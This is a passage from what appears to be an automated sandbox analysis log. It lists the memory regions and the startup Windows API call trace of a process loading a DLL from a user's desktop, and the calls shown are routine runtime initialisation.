"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 670 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 671 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 672 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 673 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 674 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 675 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 676 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 677 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 678 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 679 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 680 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 681 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 682 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 683 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 684 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 685 start_va = 0x600000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 686 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 687 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 688 start_va = 0x600000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 689 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Thread: id = 30 os_tid = 0xae4 [0031.619] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f854 | out: lpSystemTimeAsFileTime=0x24f854*(dwLowDateTime=0xe090afb0, dwHighDateTime=0x1d3dfba)) [0031.619] GetCurrentProcessId () returned 0xae0 [0031.619] GetCurrentThreadId () returned 0xae4 [0031.619] GetTickCount () returned 0x1710a [0031.619] QueryPerformanceCounter (in: lpPerformanceCount=0x24f84c | out: lpPerformanceCount=0x24f84c*=360935534) returned 1 [0031.620] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.620] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.620] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.620] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.620] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.620] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.630] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.630] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.630] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.630] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.630] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.631] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.631] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.632] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.632] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.632] GetCurrentThreadId () returned 0xae4 [0031.632] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"0\"" [0031.632] GetEnvironmentStringsW () returned 0x397858* [0031.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.632] FreeEnvironmentStringsW (penv=0x397858) returned 1 [0031.632] GetStartupInfoA (in: lpStartupInfo=0x24f7a4 | out: lpStartupInfo=0x24f7a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.633] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.633] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.633] SetHandleCount (uNumber=0x20) returned 0x20 [0031.633] GetLastError () returned 0x0 [0031.633] SetLastError (dwErrCode=0x0) [0031.633] GetLastError () returned 0x0 [0031.633] SetLastError (dwErrCode=0x0) [0031.633] GetLastError () returned 0x0 [0031.633] SetLastError (dwErrCode=0x0) [0031.633] GetACP () returned 0x4e4 [0031.633] GetLastError () returned 0x0 [0031.633] SetLastError (dwErrCode=0x0) [0031.633] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.633] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f784 | out: lpCPInfo=0x24f784) returned 1 [0031.633] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f250 | out: lpCPInfo=0x24f250) returned 1 [0031.633] GetLastError () returned 0x0 [0031.633] SetLastError (dwErrCode=0x0) [0031.633] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x24f1e0 | out: lpCharType=0x24f1e0) returned 1 [0031.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f664, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f664, cbMultiByte=256, lpWideCharStr=0x24efc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.634] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x24f264 | out: lpCharType=0x24f264) returned 1 [0031.634] GetLastError () returned 0x0 [0031.634] SetLastError (dwErrCode=0x0) [0031.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f664, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f664, cbMultiByte=256, lpWideCharStr=0x24ef98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꄈ矲狰Ā") returned 256 [0031.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꄈ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꄈ矲狰Ā", cchSrc=256, lpDestStr=0x24ed88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x24f564, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x82îðõ\x9c÷$", lpUsedDefaultChar=0x0) returned 256 [0031.634] GetLastError () returned 0x0 [0031.634] SetLastError (dwErrCode=0x0) [0031.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f664, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f664, cbMultiByte=256, lpWideCharStr=0x24efb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꄈ矲狰Ā") returned 256 [0031.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꄈ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꄈ矲狰Ā", cchSrc=256, lpDestStr=0x24eda8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x24f464, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x82îðõ\x9c÷$", lpUsedDefaultChar=0x0) returned 256 [0031.634] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.635] SetLastError (dwErrCode=0x0) [0031.635] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.636] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.636] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.636] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.636] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.636] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.636] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.636] GetLastError () returned 0x0 [0031.636] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.637] SetLastError (dwErrCode=0x0) [0031.637] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 